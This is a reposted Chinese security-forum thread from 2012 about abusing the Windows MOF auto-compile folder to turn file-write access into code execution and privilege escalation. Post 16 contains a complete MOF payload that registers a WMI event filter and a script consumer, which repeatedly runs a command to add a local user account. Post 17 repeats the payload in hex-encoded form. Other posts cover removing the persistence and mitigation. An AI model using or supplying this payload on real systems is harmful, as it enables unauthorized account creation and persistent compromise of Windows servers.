windows写权限变成可执行权限的利用

admin 2021年4月3日19:27:14评论55 views字数 3497阅读11分39秒阅读模式

Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件

方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。

Method2: 使用 IMofCompiler 接口和 $ CompileFile 方法。

方法 3: 拖放到 %SystemRoot%System32WbemMOF 文件夹的 MOF 文件。

Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。

第三种方法仅为向后兼容性与早期版本的 WMI 提供,并因为此功能可能不会提供在将来的版本后,不应使用。

很多测试的时候会用得到吧,另外感觉应该有其他很多地方得机制可以导致自动启动?

http://support.microsoft.com/kb/245773/zh-cn


相关讨论:

1#

Sunshine (︶︿︶/ / //! 。! o∩_∩o) | 2012-12-04 12:32

我想到了提权

2#

hongygxiang (蛋疼的、) | 2012-12-04 12:33

楼主好淫荡。

3#

se55i0n (哪些年我们一起看的岛国动作片~) | 2012-12-04 12:40

好吧~看到1#~我想到了提权~

4#

情深 | 2012-12-04 12:42

貌似最近的mysql漏洞就是用来第三种。。。

5#

cnrstar (Be My Personal Best!) | 2012-12-04 13:42

还是剑老大犀利,已经发了
就像文中说的,2003下提权好用,2008后续版本不再支持第三种方法,然后就不行了。

6#

鬼哥 | 2012-12-04 15:24

@xsser 我现在只想知道怎么停止已执行的mof,昨天测试的时候放了个.mof到C:WINDOWSsystem32wbemmof 从昨天晚上一直到现在还在每过5秒就执行次 加个用户,搞的我郁闷死了。。。

昨天听 B1n4ry 说把net stop winmgmt 服务停止后,然后在删除了加进去的.mof OK 没继续执行了,,但是我怕服务器出现问题又把winmgmt 服务启动了, 邪恶 又开始5秒后自动加用户!

咋办。。

7#

xsjswt | 2012-12-04 15:50

@xsser 可写要变执行挺简单的,各种自启动,各种写hive

8#

xsser (十根阳具有长短!!) | 2012-12-04 16:01

@鬼哥 这文件删除了成么?

9#

鬼哥 | 2012-12-04 16:14

@xsser 不成,,刚baidu了下 找到了方法停止。。

10#

xsser (十根阳具有长短!!) | 2012-12-04 16:31

@鬼哥 那你也回复下啊

11#

whking | 2012-12-04 17:16

@鬼哥 删除C:WINDOWSsystem32wbemmofgood 添加的mof后,在启动winmgmt 没出现加账户啊!

C:Documents and SettingsAdministrator>net stop winmgmt
Windows Management Instrumentation 服务正在停止.
Windows Management Instrumentation 服务已成功停止。
C:Documents and SettingsAdministrator>net start winmgmt
Windows Management Instrumentation 服务正在启动 .
Windows Management Instrumentation 服务已经启动成功。

12#

鬼哥 | 2012-12-04 18:40

@whking 你这个方法不行, 删除C:WINDOWSsystem32wbemmofgood 添加的mof后 启动服务后还是会继续加用户 不相信可以叫各位集友试下。。

13#

鬼哥 | 2012-12-04 18:43

@xsser 我错了,,,正确的方式是:

第一 net stop winmgmt 停止服务,

第二 删除文件夹:C:WINDOWSsystem32wbemRepository

第三 net start winmgmt 启动服务

第四:完毕不会在执行了。C:WINDOWSsystem32wbemRepository 放的是储存库 我们执行的.mof都会被加入到这个库了。然后一直按脚本设置的时间执行。。 删除后 重新启动 会重建个默认储存库 这样我们先前执行mof就没了。

14#

solihat (试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长

15#

xsser (十根阳具有长短!!) | 2012-12-05 11:01

16#

softbug (算了,我还是做好我自己的东西) | 2012-12-05 11:28

感谢群里的vka0n0

#pragma namespace("\\.\root\subscription") instance of __EventFilter as $EventFilter {EventNamespace = "Root\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa "Win32_LocalTime" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL";}; instance of ActiveScriptEventConsumer as $Consumer {Name = "consPCSV2";ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user ftp test /add")";}; instance of __FilterToConsumerBinding {Consumer = $Consumer;Filter = $EventFilter;};

17#

softbug (算了,我还是做好我自己的东西) | 2012-12-05 11:29

感谢暴暴,

0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736

18#

cnrstar (Be My Personal Best!) | 2012-12-05 12:00

差异备份是成功不了的。。o(╯□╰)o

@xsser

19#

f1eecy | 2012-12-05 12:24

防范办法把WbemMOF文件夹设成只读就可以么?

20#

xsser (十根阳具有长短!!) | 2012-12-05 12:29

@cnrstar 嗯 得把前面的乱码处理掉

21#

sec123 | 2012-12-05 14:43

@xsser 请问如何去掉乱码。。

22#

xsser (十根阳具有长短!!) | 2012-12-05 14:48

@sec123 嗯 去掉不了 这图是转的群里的

23#

open (心佛即佛,心魔即魔.) | 2012-12-05 15:09

最重要的还是自动执行啊。这个很难过。

24#

lion(lp) | 2012-12-05 15:47

这个图片不是把FTP 这个用户删除了吗 ? 怎么还会有FTP 这个用户呢?

25#

hongygxiang (蛋疼的、) | 2012-12-05 17:41

@lion(lp) 应该是把ftp这个用户删除后,又跑了一遍sql。方便演示吧。
我失败了,各种求解释。

26#

Coody (&_&) | 2012-12-05 19:03

好吧,我测试也是失败的。。。。。o(╯□╰)o

27#

lion(lp) | 2012-12-05 19:08

我也是各种失败的。。。不知道为啥了  @hongygxiang

28#

hongygxiang (蛋疼的、) | 2012-12-06 12:19

@鬼哥 坐等大牛前来指导

摘自:http://zone.wooyun.org/content/1806

留言评论(旧系统):

佚名 @ 2012-12-07 20:03:36

不懂= =

本站回复:

╮(╯_╰)╭

核老大的脑残粉 @ 2012-12-07 21:49:30

老大 你这种文章的模式不错 我借鉴下啦 哈哈哈

本站回复:

此乃自创模式……

佚名 @ 2012-12-08 19:50:15

啊 啊啊啊 啊

本站回复:

╮(╯_╰)╭

佚名 @ 2013-04-01 03:16:40

多机测试.都没成功.

本站回复:

╮(╯_╰)╭

文章来源于lcx.cc:windows写权限变成可执行权限的利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:27:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   windows写权限变成可执行权限的利用https://cn-sec.com/archives/322605.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息